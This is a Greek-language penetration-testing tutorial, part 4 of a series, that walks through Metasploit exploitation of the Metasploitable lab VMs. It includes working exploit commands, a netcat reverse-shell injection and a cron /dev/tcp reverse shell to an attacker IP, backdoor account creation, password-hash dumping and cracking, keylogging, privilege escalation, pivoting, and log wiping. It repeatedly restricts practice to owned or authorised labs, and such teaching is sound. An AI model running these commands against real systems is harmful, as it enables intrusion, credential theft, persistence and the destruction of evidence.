Το Μονοπάτι του Hacker: Σειρά 5 Μερών
Μέρος 1: Εισαγωγή → Μέρος 2: Εξοικείωση με το Flipper → Μέρος 3: Βασικά του Kali → Μέρος 4: Exploitation → Μέρος 5: Ο Πλήρης Έλεγχος
Στα Μέρη 1-3, χτίσατε την εργαλειοθήκη σας. Μπορείτε να κλωνοποιήσετε κάρτες, να χαρτογραφήσετε δίκτυα, να αιχμαλωτίσετε handshakes και να εντοπίσετε κάθε υπηρεσία που τρέχει σε έναν στόχο. Βλέπετε ευπάθειες παντού πλέον. Αλλά το να βλέπεις μια ευπάθεια και το να την εκμεταλλεύεσαι είναι πολύ διαφορετικές δεξιότητες.
Εδώ τα πράγματα γίνονται σοβαρά. Σήμερα θα μάθετε να χρησιμοποιείτε το Metasploit Framework, το ίδιο εργαλείο που χρησιμοποιούν επαγγελματίες penetration testers σε όλο τον κόσμο. Θα εκμεταλλευτείτε την πρώτη σας ευπάθεια, θα εδραιώσετε persistence, θα κλιμακώσετε δικαιώματα και θα μάθετε να κάνετε pivot μέσα σε ένα δίκτυο.
Η Γραμμή που Δεν Πρέπει να Περάσεις
Όλα σε αυτό το άρθρο πρέπει να εξασκηθούν σε συστήματα που σας ανήκουν ή έχετε ρητή γραπτή άδεια να δοκιμάσετε. Η μη εξουσιοδοτημένη πρόσβαση σε υπολογιστικά συστήματα είναι ομοσπονδιακό έγκλημα με ποινές έως 20 χρόνια φυλάκισης. Το "Απλώς μάθαινα" δεν αποτελεί υπεράσπιση. Φτιάξτε ένα εργαστήριο, χρησιμοποιήστε εσκεμμένα ευπαθή VMs και μην αγγίζετε ποτέ συστήματα που δεν σας ανήκουν.
Μέρος 1: Χτίζοντας το Εργαστήριο Επιθέσεων
Πριν εκμεταλλευτείτε οτιδήποτε, χρειάζεστε στόχους. Οι πραγματικοί penetration testers χρησιμοποιούν απομονωμένα εργαστηριακά περιβάλλοντα με εσκεμμένα ευπαθή μηχανήματα. Θα κάνετε το ίδιο.
Η Βασική Εγκατάσταση Εργαστηρίου
Τι θα Χρειαστείτε
- Kali Linux VM - Το μηχάνημα επίθεσής σας (από το Μέρος 3)
- Metasploitable 2 - Εσκεμμένα ευπαθές Linux VM (SourceForge)
- Metasploitable 3 - Ευπαθές Windows/Linux VM (GitHub)
- DVWA - Damn Vulnerable Web Application (GitHub)
- VulnHub VMs - CTF-style ευπαθή μηχανήματα (vulnhub.com)
Πρακτική Άσκηση: Εγκατάσταση Δικτύου Εργαστηρίου
Χρόνος: 45 λεπτά
- Κατεβάστε το Metasploitable 2 από το SourceForge
- Εισαγάγετε το στο VirtualBox/VMware
- Ρυθμίστε το δίκτυο: Βάλτε και το Kali και το Metasploitable σε "Host-Only" ή "Internal Network"
- Εκκινήστε το Metasploitable (προεπιλεγμένη σύνδεση:
msfadmin/msfadmin) - Σημειώστε τη διεύθυνση IP:
ifconfig - Από το Kali, επαληθεύστε τη συνδεσιμότητα:
ping METASPLOITABLE_IP - Εκτελέστε αρχική σάρωση:
sudo nmap -sV -sC METASPLOITABLE_IP
Επαλήθευση: Θα πρέπει να δείτε δεκάδες ανοιχτές θύρες. Το Metasploitable είναι σχεδιασμένο για να παραβιαστεί.
Η σάρωση nmap του Metasploitable θα πρέπει να αποκαλύψει υπηρεσίες όπως FTP, SSH, Telnet, SMTP, HTTP, Samba, MySQL, PostgreSQL και άλλες, πολλές από τις οποίες τρέχουν παλιές, ευπαθείς εκδόσεις. Αυτό είναι το playground σας.
Μέρος 2: Βασικά του Metasploit Framework
Το Metasploit δεν είναι απλά ένα εργαλείο. Είναι ένα ολόκληρο οικοσύστημα. Περιέχει χιλιάδες exploits, payloads, βοηθητικά modules και εργαλεία post-exploitation. Η κατανόηση της δομής του είναι ουσιώδης.
Εκκίνηση του Metasploit
bash# Initialize the database (first time only)
sudo msfdb init
# Start Metasploit console
msfconsole
# You'll see the Metasploit banner and prompt:
msf6 >Η Δομή του Metasploit
Το Metasploit οργανώνει τα πάντα σε modules:
- Exploits - Κώδικας που εκμεταλλεύεται ευπάθειες
- Payloads - Κώδικας που εκτελείται μετά το exploitation (shells, meterpreter)
- Auxiliary - Scanners, fuzzers και άλλα εργαλεία
- Post - Post-exploitation modules για persistence, pivoting
- Encoders - Συσκότιση payloads για αποφυγή ανίχνευσης
bash# Search for modules
msf6 > search type:exploit platform:linux smb
# Search by CVE
msf6 > search cve:2017-0144
# Search by name
msf6 > search vsftpd
# Get info about a module
msf6 > info exploit/unix/ftp/vsftpd_234_backdoorΗ Ροή Εργασίας Exploitation
Κάθε exploitation στο Metasploit ακολουθεί το ίδιο μοτίβο:
- Επιλέξτε ένα exploit -
use exploit/path/to/module - Ρυθμίστε τις επιλογές - Target IP, θύρες, credentials
- Επιλέξτε ένα payload - Τι εκτελείται μετά το exploitation
- Εκτελέστε -
exploitήrun
Μέρος 3: Το Πρώτο σας Exploit
Ας εκμεταλλευτούμε ένα από τα πιο διάσημα backdoors στην ιστορία: το vsftpd 2.3.4 backdoor. Το 2011, κάποιος εισήγαγε ένα backdoor στον πηγαίο κώδικα του vsftpd. Αν στείλετε ένα username που τελειώνει σε :), ανοίγει ένα shell στη θύρα 6200.
Το Metasploitable 2 τρέχει ακριβώς αυτή την έκδοση.
bash# Start Metasploit
msfconsole
# Search for the exploit
msf6 > search vsftpd
# Select the exploit
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
# View required options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
# Set the target
msf6 exploit(...) > set RHOSTS 192.168.56.101
# Run the exploit
msf6 exploit(...) > exploit
# If successful:
[*] Command shell session 1 opened
[+] Got shell!
# You now have a root shell on the target
whoami
root
id
uid=0(root) gid=0(root)Αυτό ήταν. Μία ευπαθής υπηρεσία, ένα exploit, πρόσβαση root. Γι' αυτό είναι σημαντικό να ενημερώνετε το λογισμικό σας.
Πρακτική Άσκηση: Exploit στο vsftpd Backdoor
Χρόνος: 15 λεπτά
Προαπαιτούμενα: Metasploitable 2 σε λειτουργία, Kali στο ίδιο δίκτυο
- Επαληθεύστε ότι τρέχει FTP:
nmap -sV -p 21 TARGET_IP - Εκκινήστε το msfconsole
- Αναζητήστε, επιλέξτε και ρυθμίστε το vsftpd exploit
- Εκτελέστε το exploit
- Μόλις αποκτήσετε shell, εξερευνήστε:
cat /etc/shadow
Κριτήρια επιτυχίας: Μπορείτε να διαβάσετε το /etc/shadow, στο οποίο μόνο ο root έχει πρόσβαση.
Μέρος 4: Κατανόηση των Payloads
Ένα payload είναι αυτό που εκτελείται μετά την επιτυχία του exploit. Το βασικό shell που πήραμε παραπάνω είναι απλό, αλλά το Metasploit προσφέρει πολύ πιο ισχυρές επιλογές.
Τύποι Payloads
- Singles - Αυτόνομα, μιας χρήσης payloads (προσθήκη χρήστη, εκτέλεση εντολής)
- Stagers - Μικρά payloads που δημιουργούν σύνδεση και στη συνέχεια κατεβάζουν το κύριο payload
- Stages - Το κύριο payload που κατεβάζει ο stager (Meterpreter)
bash# List compatible payloads for current exploit
msf6 exploit(...) > show payloads
# Set a specific payload
msf6 exploit(...) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
# Payload naming convention:
# platform/arch/payload_type/connection_type
# linux/x86/meterpreter/reverse_tcp
# windows/x64/shell/bind_tcpReverse vs Bind Shells
- Reverse shell - Ο στόχος συνδέεται πίσω σε εσάς. Καλύτερο για παράκαμψη firewalls (η εξερχόμενη κίνηση συνήθως επιτρέπεται).
- Bind shell - Ο στόχος ανοίγει μια θύρα για να συνδεθείτε. Πιο εύκολο στην ανίχνευση, συχνά μπλοκάρεται από firewalls.
bash# For reverse shells, you must set your IP
msf6 exploit(...) > set LHOST YOUR_KALI_IP
msf6 exploit(...) > set LPORT 4444
# Metasploit starts a listener automatically when you exploitMeterpreter: Το Απόλυτο Payload
Το Meterpreter είναι το πιο ισχυρό payload του Metasploit. Εκτελείται εξ ολοκλήρου στη μνήμη (χωρίς αρχεία στον δίσκο), παρέχει κρυπτογραφημένη επικοινωνία και περιλαμβάνει δεκάδες ενσωματωμένες εντολές για post-exploitation.
bash# Meterpreter commands (once you have a session)
meterpreter > sysinfo # System information
meterpreter > getuid # Current user
meterpreter > pwd # Current directory
meterpreter > ls # List files
meterpreter > download file # Download file to Kali
meterpreter > upload file # Upload file to target
meterpreter > shell # Drop to system shell
meterpreter > hashdump # Dump password hashes
meterpreter > screenshot # Take screenshot
meterpreter > keyscan_start # Start keylogger
meterpreter > keyscan_dump # Dump keystrokes
meterpreter > background # Background this sessionΜέρος 5: Περισσότερες Τεχνικές Exploitation
Exploitation του Samba (SMB)
Το Metasploitable 2 τρέχει μια ευπαθή έκδοση του Samba. Αυτό μοιάζει με το περιβόητο EternalBlue exploit που χρησιμοποιήθηκε στο WannaCry.
bash# Search for Samba exploits
msf6 > search type:exploit samba
# The "username map script" vulnerability
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS TARGET_IP
msf6 exploit(...) > set PAYLOAD cmd/unix/reverse
msf6 exploit(...) > set LHOST YOUR_IP
msf6 exploit(...) > exploit
[*] Command shell session 2 openedExploitation Αδύναμων Credentials
Δεν απαιτεί κάθε παραβίαση μια ευπάθεια λογισμικού. Οι αδύναμοι κωδικοί είναι παντού.
bash# SSH brute-force auxiliary module
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS TARGET_IP
msf6 auxiliary(...) > set USERNAME root
msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(...) > set STOP_ON_SUCCESS true
msf6 auxiliary(...) > run
# For known credentials
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run
[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'Exploitation Εφαρμογών Web
Το Metasploitable περιλαμβάνει αρκετές ευπαθείς εφαρμογές web. Ας εκμεταλλευτούμε ένα PHP code injection.
bash# First, browse to http://TARGET/mutillidae/
# Find the "User Lookup" page (vulnerable to SQLi and code injection)
# Use Metasploit's web exploits
msf6 > search type:exploit php
# Or exploit manually with command injection:
# In vulnerable input field:
; cat /etc/passwd
; nc -e /bin/bash YOUR_IP 4444Πρακτική Άσκηση: Exploit σε Τρεις Διαφορετικές Υπηρεσίες
Χρόνος: 60 λεπτά
Στόχος: Metasploitable 2
- Exploit στο vsftpd backdoor (FTP - θύρα 21) και απόκτηση root shell
- Exploit στο Samba usermap_script (SMB - θύρα 139/445) και απόκτηση root shell
- Σπάσιμο SSH credentials (θύρα 22) χρησιμοποιώντας auxiliary/scanner/ssh/ssh_login
- Τεκμηρίωση κάθε exploitation: module που χρησιμοποιήθηκε, επιλογές που ρυθμίστηκαν, αποτέλεσμα
Bonus: Εξερευνήστε τις εφαρμογές web στη θύρα 80 και βρείτε χειροκίνητους φορείς exploitation.
Μέρος 6: Post-Exploitation
Η απόκτηση shell είναι μόνο η αρχή. Οι πραγματικές δοκιμές διείσδυσης απαιτούν να αποδείξετε τι θα μπορούσε να κάνει ένας επιτιθέμενος με αυτή την πρόσβαση. Αυτό είναι το post-exploitation.
Συλλογή Πληροφοριών
text# From a Meterpreter session
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24
Architecture: i686
Meterpreter : x86/linux
# Network information
meterpreter > ipconfig
meterpreter > route
meterpreter > arpbash# From a regular shell
cat /etc/passwd # All users
cat /etc/shadow # Password hashes (requires root)
cat /etc/hosts # Network mappings
netstat -tulpn # Open ports
ps aux # Running processes
crontab -l # Scheduled tasksΣυλλογή Credentials
text# Dump password hashes
meterpreter > hashdump
root:$1$XtqVHIvN$0MnR7..........:0:0:root:/root:/bin/bash
msfadmin:$1$XN10Zj2c$Rt/zzC........:1000:1000::/home/msfadmin:/bin/bashbash# Or from shell
cat /etc/shadow
# Crack hashes offline with John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Or hashcat (faster with GPU)
hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txtΕδραίωση Persistence
Persistence σημαίνει διατήρηση πρόσβασης ακόμα και μετά από επανεκκινήσεις ή όταν ο αρχικός φορέας exploit έχει διορθωθεί.
bash# Add a new user with sudo access
useradd -m -s /bin/bash hacker
echo "hacker:password123" | chpasswd
usermod -aG sudo hacker
# Add SSH key for passwordless access
mkdir /home/hacker/.ssh
echo "YOUR_PUBLIC_KEY" >> /home/hacker/.ssh/authorized_keys
# Cron-based reverse shell (reconnects every minute)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root
# Metasploit persistence module
meterpreter > run persistence -h
meterpreter > run persistence -X -i 60 -p 4444 -r YOUR_IPPersistence = Αποδεικτικά Στοιχεία
Κάθε μηχανισμός persistence αφήνει ίχνη. Σε μια πραγματική δοκιμή διείσδυσης, τεκμηριώνετε τι θα μπορούσατε να κάνετε και στη συνέχεια καθαρίζετε. Το να αφήνετε backdoors σε συστήματα πελατών είναι αντιεπαγγελματικό και δυνητικά παράνομο. Στο εργαστήριό σας, κάντε ό,τι θέλετε, αλλά κατανοήστε τις επιπτώσεις.
Μέρος 7: Κλιμάκωση Δικαιωμάτων
Συχνά αποκτάτε αρχική πρόσβαση ως χρήστης χαμηλών δικαιωμάτων. Η κλιμάκωση σε root/admin απαιτείται συνήθως για την επίτευξη των στόχων της δοκιμής.
Κλιμάκωση Δικαιωμάτων σε Linux
bash# Current user context
id
whoami
# SUID binaries (run as owner regardless of who executes)
find / -perm -4000 -type f 2>/dev/null
# World-writable directories
find / -writable -type d 2>/dev/null
# Sudo permissions
sudo -l
# Kernel version (for kernel exploits)
uname -a
# Running processes as root
ps aux | grep root
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*Αυτοματοποιημένα Scripts Απαρίθμησης
- LinPEAS - github.com/carlospolop/PEASS-ng
- LinEnum - github.com/rebootuser/LinEnum
- linux-exploit-suggester - GitHub
bash# Upload and run LinPEAS
# From Kali, host the script:
python3 -m http.server 8000
# From target:
wget http://YOUR_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# LinPEAS highlights potential vectors in colors:
# RED/YELLOW = Critical findings, likely exploitableΣυνηθισμένοι Φορείς Privesc σε Linux
bash# 1. Sudo misconfiguration
sudo -l
# If you see: (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c '!sh'
# Instant root shell
# 2. SUID binary exploitation
# If /usr/bin/find has SUID bit:
find . -exec /bin/sh -p \;
# 3. Writable /etc/passwd
# Generate password hash:
openssl passwd -1 mypassword
# Add to /etc/passwd:
echo 'hacker:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd
# 4. Cron job exploitation
# If a cron runs a writable script as root:
echo 'chmod +s /bin/bash' >> /path/to/cron/script
# Wait for cron, then:
/bin/bash -p
# Root shellΚλιμάκωση Δικαιωμάτων σε Windows
Αν δοκιμάζετε στόχους Windows (Metasploitable 3), οι τεχνικές διαφέρουν:
text# From Meterpreter on Windows
meterpreter > getuid
Server username: VICTIM\lowpriv_user
meterpreter > getsystem
[+] ...got SYSTEM
# If getsystem fails, try:
meterpreter > run post/multi/recon/local_exploit_suggester
# Or background and use specific exploit:
meterpreter > background
msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf6 exploit(...) > set SESSION 1
msf6 exploit(...) > exploitΠρακτική Άσκηση: Κλιμάκωση από Χρήστη σε Root
Χρόνος: 45 λεπτά
Σενάριο: Έχετε SSH πρόσβαση στο Metasploitable ως msfadmin (χωρίς root)
- SSH στο Metasploitable:
ssh msfadmin@TARGET - Εκτελέστε
idγια να επιβεβαιώσετε ότι δεν είστε root - Ελέγξτε δικαιώματα sudo:
sudo -l - Αναζητήστε SUID binaries:
find / -perm -4000 2>/dev/null - Ανεβάστε και εκτελέστε LinPEAS
- Εντοπίστε έναν φορέα privesc και εκμεταλλευτείτε τον
Στόχος: Αποκτήστε root shell χρησιμοποιώντας κάτι άλλο εκτός από exploitation δικτυακής υπηρεσίας.
Μέρος 8: Pivoting
Το pivoting είναι η χρήση ενός παραβιασμένου συστήματος για να επιτεθείτε σε άλλα συστήματα που δεν είναι απευθείας προσβάσιμα από το μηχάνημα επίθεσής σας. Έτσι κινούνται οι επιτιθέμενοι πλευρικά μέσα στα δίκτυα.
Το Σενάριο Pivot
Φανταστείτε αυτό το δίκτυο:
- Το Kali σας: 192.168.1.100
- Παραβιασμένος host: 192.168.1.50 (επίσης συνδεδεμένος στο εσωτερικό δίκτυο 10.0.0.0/24)
- Στόχος: 10.0.0.10 (προσβάσιμος μόνο από το 192.168.1.50)
Δεν μπορείτε να φτάσετε το 10.0.0.10 απευθείας. Αλλά μέσω του παραβιασμένου host, μπορείτε.
Δρομολόγηση Metasploit
text# After getting a Meterpreter session on the pivot host
meterpreter > ipconfig
# Shows two interfaces: 192.168.1.50 and 10.0.0.50
meterpreter > run autoroute -s 10.0.0.0/24
[+] Added route to 10.0.0.0/24 via session 1
meterpreter > background
# Now Metasploit routes 10.0.0.0/24 traffic through session 1
msf6 > route print
# Scan the internal network
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(...) > set RHOSTS 10.0.0.1-254
msf6 auxiliary(...) > set PORTS 22,80,443,445
msf6 auxiliary(...) > run
# Exploit internal targets through the pivot
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > set RHOSTS 10.0.0.10
msf6 exploit(...) > exploitSOCKS Proxy για Πλήρη Πρόσβαση
bash# Set up a SOCKS proxy through Meterpreter
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(...) > set SRVPORT 1080
msf6 auxiliary(...) > run
# Configure proxychains (/etc/proxychains4.conf)
socks5 127.0.0.1 1080
# Now any tool can access the internal network
proxychains nmap -sT -Pn 10.0.0.10
proxychains curl http://10.0.0.10
proxychains ssh [email protected]SSH Tunneling (Χωρίς Metasploit)
bash# Dynamic port forwarding (SOCKS proxy)
ssh -D 1080 user@pivot_host
# Local port forwarding (specific port)
ssh -L 8080:10.0.0.10:80 user@pivot_host
# Now localhost:8080 reaches 10.0.0.10:80
# Remote port forwarding (expose your service to internal network)
ssh -R 4444:localhost:4444 user@pivot_host
# Internal hosts can reach your port 4444 via pivot_host:4444Μέρος 9: Κάλυψη Ιχνών
Οι επαγγελματίες penetration testers τεκμηριώνουν την πρόσβασή τους αλλά καθαρίζουν μετά. Η κατανόηση του πώς οι επιτιθέμενοι καλύπτουν τα ίχνη τους βοηθά επίσης στον εντοπισμό εισβολών.
bash# Clear bash history
history -c
cat /dev/null > ~/.bash_history
# Clear auth logs (requires root)
echo "" > /var/log/auth.log
echo "" > /var/log/wtmp
echo "" > /var/log/btmp
# Remove specific log entries
sed -i '/YOUR_IP/d' /var/log/auth.log
# Timestomp (change file timestamps)
touch -r /etc/passwd /path/to/your/file
# Meterpreter
meterpreter > clearev # Clear Windows event logs
meterpreter > timestomp file -m "01/01/2020 12:00:00"Σε Πραγματικές Αναθέσεις: Μην το Κάνετε Αυτό
Οι επαγγελματίες pentesters τεκμηριώνουν την πρόσβασή τους και αναφέρουν τα ευρήματά τους. Δεν τα κρύβουν. Η εκκαθάριση logs καταστρέφει αποδεικτικά στοιχεία που χρειάζονται οι αμυντικοί για να κατανοήσουν τη διαδρομή επίθεσης. Εξασκηθείτε σε αυτές τις τεχνικές μόνο στο απομονωμένο εργαστηριακό σας περιβάλλον.
Το Μονοπάτι του Hacker
Σειρά 5 μερών που σας πάει από περίεργο σε ικανό.
Μέρος 1: Εισαγωγή Μέρος 2: Εξοικείωση με το Flipper Μέρος 3: Βασικά του Kali Μέρος 4: Exploitation ✓ Μέρος 5: Πλήρης Έλεγχος
Λίστα Ελέγχου Μέρους 4
☐ Εγκατάσταση Εργαστηρίου: Metasploitable 2 σε λειτουργία, απομονωμένο δίκτυο ρυθμισμένο
☐ Metasploit: Βάση δεδομένων αρχικοποιημένη, βασική πλοήγηση κατακτημένη
☐ Πρώτο Exploit: vsftpd backdoor εκμεταλλεύτηκε, root shell αποκτήθηκε
☐ Πολλαπλοί Φορείς: FTP, SMB exploit και σπάσιμο SSH credentials
☐ Post-Exploitation: Password hashes εξήχθησαν, σύστημα απαριθμήθηκε
☐ Κλιμάκωση Δικαιωμάτων: Κλιμάκωση από χρήστη σε root χωρίς network exploit
☐ Pivoting: Κατανόηση autoroute και SOCKS proxy concepts
☐ Τεκμηρίωση: Όλα τα exploits τεκμηριώθηκαν με βήματα και αποδεικτικά στοιχεία
Τι Ακολουθεί
Μάθατε να εκμεταλλεύεστε ευπάθειες, να κλιμακώνετε δικαιώματα και να κάνετε pivot μέσα σε δίκτυα. Είδατε πόσο γρήγορα μία μόνο αδυναμία γίνεται πλήρης παραβίαση. Καταλαβαίνετε τι κάνουν οι επαγγελματίες penetration testers.
Στο Μέρος 5, φέρνουμε τα πάντα μαζί. Θα διεξάγετε έναν πλήρη έλεγχο ασφαλείας από την αρχή μέχρι το τέλος:
- Εύρος εργασίας και κανόνες εμπλοκής
- Πλήρης μεθοδολογία αναγνώρισης
- Συστηματικό exploitation
- Ολοκληρωμένο post-exploitation
- Επαγγελματική αναφορά
- Συστάσεις αποκατάστασης
Το Μέρος 5 είναι η κορωνίδα. Όλα όσα μάθατε σε αυτή τη σειρά ενώνονται σε μια μεθοδολογία πραγματικού κόσμου που μπορείτε να χρησιμοποιήσετε για να αξιολογήσετε την ασφάλεια οποιουδήποτε δικτύου είστε εξουσιοδοτημένοι να δοκιμάσετε.
Μάθατε τις τεχνικές. Τώρα μαθαίνετε τη μεθοδολογία. Το Μέρος 5 μετατρέπει τις δεξιότητες σε μια πλήρη ροή εργασίας δοκιμών διείσδυσης.
Τα λέμε στο Μέρος 5.